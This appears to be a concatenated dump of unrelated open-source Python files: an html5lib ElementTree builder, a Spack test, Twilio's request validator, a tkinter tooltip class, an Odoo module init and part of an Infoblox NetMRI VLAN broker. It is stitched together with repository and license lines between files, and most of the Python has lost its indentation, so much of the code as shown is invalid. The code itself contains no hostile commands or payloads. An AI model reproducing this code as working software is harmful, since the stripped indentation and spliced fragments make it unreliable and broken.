ha_full_path = os.path.dirname("/%s/" % self.conf.ha_confs_path)
common_utils.ensure_dir(ha_full_path)
| apache-2.0 |
TheDegree0/menescraper | menescraper/menescraper/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/etree.py | 915 | 12621 | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type
import re
from . import _base
from .. import ihatexml
from .. import constants
from ..constants import namespaces
from ..utils import moduleFactoryFactory
tag_regexp = re.compile("{([^}]*)}(.*)")
def getETreeBuilder(ElementTreeImplementation, fullTree=False):
ElementTree = ElementTreeImplementation
ElementTreeCommentType = ElementTree.Comment("asd").tag
class Element(_base.Node):
def __init__(self, name, namespace=None):
self._name = name
self._namespace = namespace
self._element = ElementTree.Element(self._getETreeTag(name,
namespace))
if namespace is None:
self.nameTuple = namespaces["html"], self._name
else:
self.nameTuple = self._namespace, self._name
self.parent = None
self._childNodes = []
self._flags = []
def _getETreeTag(self, name, namespace):
if namespace is None:
etree_tag = name
else:
etree_tag = "{%s}%s" % (namespace, name)
return etree_tag
def _setName(self, name):
self._name = name
self._element.tag = self._getETreeTag(self._name, self._namespace)
def _getName(self):
return self._name
name = property(_getName, _setName)
def _setNamespace(self, namespace):
self._namespace = namespace
self._element.tag = self._getETreeTag(self._name, self._namespace)
def _getNamespace(self):
return self._namespace
namespace = property(_getNamespace, _setNamespace)
def _getAttributes(self):
return self._element.attrib
def _setAttributes(self, attributes):
# Delete existing attributes first
# XXX - there may be a better way to do this...
for key in list(self._element.attrib.keys()):
del self._element.attrib[key]
for key, value in attributes.items():
                if isinstance(key, tuple):
                    # Namespaced attribute keys are (prefix, name, namespace)
                    # tuples; build the Clark-notation name from parts 2 and 1.
                    name = "{%s}%s" % (key[2], key[1])
else:
name = key
self._element.set(name, value)
attributes = property(_getAttributes, _setAttributes)
def _getChildNodes(self):
return self._childNodes
def _setChildNodes(self, value):
del self._element[:]
self._childNodes = []
for element in value:
self.insertChild(element)
childNodes = property(_getChildNodes, _setChildNodes)
def hasContent(self):
"""Return true if the node has children or text"""
return bool(self._element.text or len(self._element))
def appendChild(self, node):
self._childNodes.append(node)
self._element.append(node._element)
node.parent = self
def insertBefore(self, node, refNode):
index = list(self._element).index(refNode._element)
self._element.insert(index, node._element)
node.parent = self
def removeChild(self, node):
self._element.remove(node._element)
node.parent = None
def insertText(self, data, insertBefore=None):
if not(len(self._element)):
if not self._element.text:
self._element.text = ""
self._element.text += data
elif insertBefore is None:
# Insert the text as the tail of the last child element
if not self._element[-1].tail:
self._element[-1].tail = ""
self._element[-1].tail += data
else:
# Insert the text before the specified node
children = list(self._element)
index = children.index(insertBefore._element)
if index > 0:
if not self._element[index - 1].tail:
self._element[index - 1].tail = ""
self._element[index - 1].tail += data
else:
if not self._element.text:
self._element.text = ""
self._element.text += data
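        # The branches above follow ElementTree's text/tail model: text that
        # precedes the first child element is stored in the parent's .text,
        # while text that follows a child is stored in that child's .tail.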
def cloneNode(self):
element = type(self)(self.name, self.namespace)
for name, value in self.attributes.items():
element.attributes[name] = value
return element
def reparentChildren(self, newParent):
if newParent.childNodes:
newParent.childNodes[-1]._element.tail += self._element.text
else:
if not newParent._element.text:
newParent._element.text = ""
if self._element.text is not None:
newParent._element.text += self._element.text
self._element.text = ""
_base.Node.reparentChildren(self, newParent)
class Comment(Element):
def __init__(self, data):
# Use the superclass constructor to set all properties on the
# wrapper element
self._element = ElementTree.Comment(data)
self.parent = None
self._childNodes = []
self._flags = []
def _getData(self):
return self._element.text
def _setData(self, value):
self._element.text = value
data = property(_getData, _setData)
class DocumentType(Element):
def __init__(self, name, publicId, systemId):
Element.__init__(self, "<!DOCTYPE>")
self._element.text = name
self.publicId = publicId
self.systemId = systemId
def _getPublicId(self):
return self._element.get("publicId", "")
def _setPublicId(self, value):
if value is not None:
self._element.set("publicId", value)
publicId = property(_getPublicId, _setPublicId)
def _getSystemId(self):
return self._element.get("systemId", "")
def _setSystemId(self, value):
if value is not None:
self._element.set("systemId", value)
systemId = property(_getSystemId, _setSystemId)
class Document(Element):
def __init__(self):
Element.__init__(self, "DOCUMENT_ROOT")
class DocumentFragment(Element):
def __init__(self):
Element.__init__(self, "DOCUMENT_FRAGMENT")
def testSerializer(element):
rv = []
def serializeElement(element, indent=0):
if not(hasattr(element, "tag")):
element = element.getroot()
if element.tag == "<!DOCTYPE>":
if element.get("publicId") or element.get("systemId"):
publicId = element.get("publicId") or ""
systemId = element.get("systemId") or ""
rv.append("""<!DOCTYPE %s "%s" "%s">""" %
(element.text, publicId, systemId))
else:
rv.append("<!DOCTYPE %s>" % (element.text,))
elif element.tag == "DOCUMENT_ROOT":
rv.append("#document")
if element.text is not None:
rv.append("|%s\"%s\"" % (' ' * (indent + 2), element.text))
if element.tail is not None:
raise TypeError("Document node cannot have tail")
if hasattr(element, "attrib") and len(element.attrib):
raise TypeError("Document node cannot have attributes")
elif element.tag == ElementTreeCommentType:
rv.append("|%s<!-- %s -->" % (' ' * indent, element.text))
else:
assert isinstance(element.tag, text_type), \
"Expected unicode, got %s, %s" % (type(element.tag), element.tag)
nsmatch = tag_regexp.match(element.tag)
if nsmatch is None:
name = element.tag
else:
ns, name = nsmatch.groups()
prefix = constants.prefixes[ns]
name = "%s %s" % (prefix, name)
rv.append("|%s<%s>" % (' ' * indent, name))
if hasattr(element, "attrib"):
attributes = []
for name, value in element.attrib.items():
nsmatch = tag_regexp.match(name)
if nsmatch is not None:
ns, name = nsmatch.groups()
prefix = constants.prefixes[ns]
attr_string = "%s %s" % (prefix, name)
else:
attr_string = name
attributes.append((attr_string, value))
for name, value in sorted(attributes):
rv.append('|%s%s="%s"' % (' ' * (indent + 2), name, value))
if element.text:
rv.append("|%s\"%s\"" % (' ' * (indent + 2), element.text))
indent += 2
for child in element:
serializeElement(child, indent)
if element.tail:
rv.append("|%s\"%s\"" % (' ' * (indent - 2), element.tail))
serializeElement(element, 0)
return "\n".join(rv)
def tostring(element):
"""Serialize an element and its child nodes to a string"""
rv = []
filter = ihatexml.InfosetFilter()
def serializeElement(element):
if isinstance(element, ElementTree.ElementTree):
element = element.getroot()
if element.tag == "<!DOCTYPE>":
if element.get("publicId") or element.get("systemId"):
publicId = element.get("publicId") or ""
systemId = element.get("systemId") or ""
rv.append("""<!DOCTYPE %s PUBLIC "%s" "%s">""" %
(element.text, publicId, systemId))
else:
rv.append("<!DOCTYPE %s>" % (element.text,))
elif element.tag == "DOCUMENT_ROOT":
if element.text is not None:
rv.append(element.text)
if element.tail is not None:
raise TypeError("Document node cannot have tail")
if hasattr(element, "attrib") and len(element.attrib):
raise TypeError("Document node cannot have attributes")
for child in element:
serializeElement(child)
elif element.tag == ElementTreeCommentType:
rv.append("<!--%s-->" % (element.text,))
else:
# This is assumed to be an ordinary element
if not element.attrib:
rv.append("<%s>" % (filter.fromXmlName(element.tag),))
else:
attr = " ".join(["%s=\"%s\"" % (
filter.fromXmlName(name), value)
for name, value in element.attrib.items()])
rv.append("<%s %s>" % (element.tag, attr))
if element.text:
rv.append(element.text)
for child in element:
serializeElement(child)
rv.append("</%s>" % (element.tag,))
if element.tail:
rv.append(element.tail)
serializeElement(element)
return "".join(rv)
class TreeBuilder(_base.TreeBuilder):
documentClass = Document
doctypeClass = DocumentType
elementClass = Element
commentClass = Comment
fragmentClass = DocumentFragment
implementation = ElementTreeImplementation
def testSerializer(self, element):
return testSerializer(element)
def getDocument(self):
if fullTree:
return self.document._element
else:
if self.defaultNamespace is not None:
return self.document._element.find(
"{%s}html" % self.defaultNamespace)
else:
return self.document._element.find("html")
def getFragment(self):
return _base.TreeBuilder.getFragment(self)._element
return locals()
getETreeModule = moduleFactoryFactory(getETreeBuilder)
| gpl-2.0 |
iulian787/spack | lib/spack/spack/test/cmd/print_shell_vars.py | 5 | 1315 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.main import print_setup_info
def test_print_shell_vars_sh(capsys):
print_setup_info('sh')
out, _ = capsys.readouterr()
assert "_sp_sys_type=" in out
assert "_sp_tcl_roots=" in out
assert "_sp_lmod_roots=" in out
assert "_sp_module_prefix" not in out
def test_print_shell_vars_csh(capsys):
print_setup_info('csh')
out, _ = capsys.readouterr()
assert "set _sp_sys_type = " in out
assert "set _sp_tcl_roots = " in out
assert "set _sp_lmod_roots = " in out
assert "set _sp_module_prefix = " not in out
def test_print_shell_vars_sh_modules(capsys):
print_setup_info('sh', 'modules')
out, _ = capsys.readouterr()
assert "_sp_sys_type=" in out
assert "_sp_tcl_roots=" in out
assert "_sp_lmod_roots=" in out
assert "_sp_module_prefix=" in out
def test_print_shell_vars_csh_modules(capsys):
print_setup_info('csh', 'modules')
out, _ = capsys.readouterr()
assert "set _sp_sys_type = " in out
assert "set _sp_tcl_roots = " in out
assert "set _sp_lmod_roots = " in out
assert "set _sp_module_prefix = " in out
| lgpl-2.1 |
makaimc/video-service-django | twilio/util.py | 47 | 5420 | import base64
import hmac
import time
from hashlib import sha1
from . import jwt
from .compat import izip, urlencode
from six import iteritems, PY3
class RequestValidator(object):
def __init__(self, token):
self.token = token.encode("utf-8")
def compute_signature(self, uri, params, utf=PY3):
"""Compute the signature for a given request
:param uri: full URI that Twilio requested on your server
:param params: post vars that Twilio sent with the request
:param utf: whether return should be bytestring or unicode (python3)
:returns: The computed signature
"""
s = uri
if len(params) > 0:
for k, v in sorted(params.items()):
s += k + v
# compute signature and compare signatures
mac = hmac.new(self.token, s.encode("utf-8"), sha1)
computed = base64.b64encode(mac.digest())
if utf:
computed = computed.decode('utf-8')
return computed.strip()
def validate(self, uri, params, signature):
"""Validate a request from Twilio
:param uri: full URI that Twilio requested on your server
:param params: post vars that Twilio sent with the request
        :param signature: expected signature in HTTP X-Twilio-Signature header
:returns: True if the request passes validation, False if not
"""
return secure_compare(self.compute_signature(uri, params), signature)
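# A minimal usage sketch of RequestValidator (the token, URL, params and the
# `request` object below are illustrative, not part of this module):
#
#   validator = RequestValidator("my_twilio_auth_token")
#   uri = "https://example.com/twilio/callback"
#   params = {"From": "+15551234567", "Body": "hello"}
#   signature = request.headers.get("X-Twilio-Signature")
#   if not validator.validate(uri, params, signature):
#       raise PermissionError("invalid Twilio signature")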
def secure_compare(string1, string2):
"""Compare two strings while protecting against timing attacks
:param str string1: the first string
:param str string2: the second string
:returns: True if the strings are equal, False if not
:rtype: :obj:`bool`
"""
if len(string1) != len(string2):
return False
result = True
for c1, c2 in izip(string1, string2):
result &= c1 == c2
return result
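# Note: Python 3.3+ ships hmac.compare_digest, which performs the same
# constant-time comparison as the loop above.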
class TwilioCapability(object):
"""
A token to control permissions with Twilio Client
:param str account_sid: the account sid to which this token
is granted access
:param str auth_token: the secret key used to sign the token.
Note, this auth token is not visible to the
user of the token.
:returns: A new TwilioCapability with zero permissions
"""
def __init__(self, account_sid, auth_token):
self.account_sid = account_sid
self.auth_token = auth_token
self.capabilities = {}
self.client_name = None
def payload(self):
"""Return the payload for this token."""
if "outgoing" in self.capabilities and self.client_name is not None:
scope = self.capabilities["outgoing"]
scope.params["clientName"] = self.client_name
capabilities = self.capabilities.values()
scope_uris = [str(scope_uri) for scope_uri in capabilities]
return {
"scope": " ".join(scope_uris)
}
def generate(self, expires=3600):
"""Generate a valid JWT token with an expiration date.
:param int expires: The token lifetime, in seconds. Defaults to
1 hour (3600)
"""
payload = self.payload()
payload['iss'] = self.account_sid
payload['exp'] = int(time.time() + expires)
return jwt.encode(payload, self.auth_token)
def allow_client_outgoing(self, application_sid, **kwargs):
"""Allow the user of this token to make outgoing connections.
Keyword arguments are passed to the application.
:param str application_sid: Application to contact
"""
scope_params = {
"appSid": application_sid,
}
if kwargs:
scope_params["appParams"] = urlencode(kwargs, doseq=True)
self.capabilities["outgoing"] = ScopeURI("client", "outgoing",
scope_params)
def allow_client_incoming(self, client_name):
"""If the user of this token should be allowed to accept incoming
connections then configure the TwilioCapability through this method and
specify the client name.
:param str client_name: Client name to accept calls from
"""
self.client_name = client_name
self.capabilities["incoming"] = ScopeURI("client", "incoming", {
'clientName': client_name
})
def allow_event_stream(self, **kwargs):
"""Allow the user of this token to access their event stream."""
scope_params = {
"path": "/2010-04-01/Events",
}
if kwargs:
scope_params['params'] = urlencode(kwargs, doseq=True)
self.capabilities["events"] = ScopeURI("stream", "subscribe",
scope_params)
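# A minimal usage sketch of TwilioCapability (the account SID, auth token
# and client name are illustrative):
#
#   capability = TwilioCapability("ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", "secret")
#   capability.allow_client_incoming("alice")
#   jwt_token = capability.generate(expires=600)  # JWT for the Client SDK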
class ScopeURI(object):
def __init__(self, service, privilege, params=None):
self.service = service
self.privilege = privilege
self.params = params
def __str__(self):
if self.params:
sorted_params = sorted([(k, v) for k, v in iteritems(self.params)])
encoded_params = urlencode(sorted_params)
param_string = '?%s' % encoded_params
else:
param_string = ''
return "scope:%s:%s%s" % (self.service, self.privilege, param_string)
| mit |
QuantCrimAtLeeds/PredictCode | open_cp/gui/tk/tooltips.py | 1 | 4717 | """
tooltips
~~~~~~~~
Simple way to add tooltips to a widget.
Idea from https://stackoverflow.com/questions/3221956/what-is-the-simplest-way-to-make-tooltips-in-tkinter
"""
import datetime
import tkinter as tk
import tkinter.ttk as ttk
class ToolTip():
"""Class to display a tooltip over a widget. Works by monitoring when the
pointer moves over (or off) the widget. If the pointer moves over a widget
and stays over the widget for a timeout, then the tooltip is displayed.
The tooltip will be removed once the pointer leaves the widget.
Change settings by adjusting the attributes.
The tooltip is displayed using a `ttk.Label` instance. You may subclass
    and override :meth:`configure_label` to change the appearance.
:param widget: The widget to monitor.
:param text: The text to display.
"""
def __init__(self, widget, text):
self._widget = widget
self._text = text
self.timeout = 500
self.width = 250
self._future_id = None
self._tool_tip_window = None
self._widget.bind("<Enter>", self._enter, add=True)
self._widget.bind("<Leave>", self._leave, add=True)
self._widget.bind("<ButtonPress>", self._leave, add=True)
def _enter(self, event=None):
try:
if str(self._widget["state"]) == tk.DISABLED:
return
        except Exception:
            # not every widget exposes a "state" option
            pass
self._start_timer()
def _leave(self, event=None):
self._cancel_timer()
self._hide_text()
def _start_timer(self):
self._future_id = self._widget.after(self._timeout, self._show_text)
def _cancel_timer(self):
future = self._future_id
self._future_id = None
if future is not None:
self._widget.after_cancel(future)
def _hide_text(self):
tw = self._tool_tip_window
self._tool_tip_window = None
if tw is not None:
tw.destroy()
def _show_text(self):
self._hide_text()
x, y = self._widget.winfo_pointerx() + 15, self._widget.winfo_pointery() + 5
self._tool_tip_window = tk.Toplevel(self._widget)
self._tool_tip_window.wm_overrideredirect(True)
self._tool_tip_window.wm_geometry("+{}+{}".format(x, y))
label = ttk.Label(self._tool_tip_window, text=self._text,
wraplength = self._width, anchor="center")
self.configure_label(label)
label.grid(ipadx=2, ipady=2)
def configure_label(self, label):
label["background"] = "#ffffff"
label["relief"] = "solid"
label["borderwidth"] = 1
label["justify"] = "left"
@property
def timeout(self):
"""Time before the tooltip is displayed. Returns a
:class:`datetime.timedelta` instance. May be set with such an instance
or an integer number of milliseconds.
"""
return datetime.timedelta(seconds = self._timeout / 1000)
@timeout.setter
def timeout(self, value):
try:
self._timeout = int(value.total_seconds() * 1000)
        except Exception:
self._timeout = value
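    # e.g. tip.timeout = 750                              # milliseconds
    #      tip.timeout = datetime.timedelta(seconds=1)    # or a timedelta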
@property
def width(self):
"""Maximum width of the tooltop before text is wrapped."""
return self._width
@width.setter
def width(self, value):
self._width = value
@property
def text(self):
"""The text which is displayed."""
return self._text
@text.setter
def text(self, value):
self._text = value
class ToolTipYellow(ToolTip):
"""As :class:`ToolTip` but with a yellow background."""
def configure_label(self, label):
super().configure_label(label)
label["background"] = "#ffff99"
# A demo / test
if __name__ == "__main__":
root = tk.Tk()
#import tkinter.ttk as ttk
button = ttk.Button(root, text="Button 1")
button.grid(padx=10, pady=10)
ToolTip(button, "Some text here")
button = ttk.Button(root, text="Button 2")
button.grid(padx=10, pady=10)
ToolTip(button, "For instance, on the planet Earth, man had always assumed "
+"that he was more intelligent than dolphins because he had achieved "
+"so much—the wheel, New York, wars and so on—whilst all the dolphins "
+"had ever done was muck about in the water having a good time. But "
+"conversely, the dolphins had always believed that they were far more "
+"intelligent than man—for precisely the same reasons.")
entry = ttk.Entry(root)
entry.grid(padx=10, pady=10)
ToolTipYellow(entry, "Some more text")
root.mainloop()
| artistic-2.0 |
vrenaville/OCB | addons/l10n_fr/report/__init__.py | 424 | 1475 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr
#
# WARNING: This program as such is intended to be used by professional
#  programmers who take the whole responsibility of assessing all potential
#  consequences resulting from its eventual inadequacies and bugs.
#  End users who are looking for a ready-to-use solution with commercial
#  guarantees and support are strongly advised to contract a Free Software
#  Service Company.
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
import base_report
import bilan_report
import compute_resultant_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
infobloxopen/infoblox-netmri | infoblox_netmri/api/broker/v2_4_0/vlan_member_broker.py | 16 | 106771 | from ..broker import Broker
class VlanMemberBroker(Broker):
controller = "vlan_members"
def show(self, **kwargs):
"""Shows the details for the specified vlan member.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_member: The vlan member identified by the specified VlanMemberID.
:rtype vlan_member: VlanMember
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
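    # A minimal usage sketch (hostname, credentials and the ID below are
    # illustrative, and get_broker is assumed to be the client's broker
    # factory):
    #
    #   from infoblox_netmri.client import InfobloxNetMRI
    #   client = InfobloxNetMRI("netmri.example.com", "admin", "password")
    #   broker = client.get_broker("VlanMember")
    #   member = broker.show(VlanMemberID=123)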
def index(self, **kwargs):
"""Lists the available vlan members. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available vlan members matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members.
:type BaseBridgeAddress: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members.
:type BaseBridgeAddress: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members.
:type BaseNumPorts: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members.
:type BaseNumPorts: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port.
:type BridgeMemberInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port.
:type BridgeMemberInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members.
:type RootBridgeAddress: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members.
:type RootBridgeAddress: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeForwardDelay: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeForwardDelay: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeHelloTime: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeHelloTime: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeMaxAge: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeMaxAge: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members.
:type StpDesignatedRoot: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members.
:type StpDesignatedRoot: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members.
:type StpForwardDelay: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members.
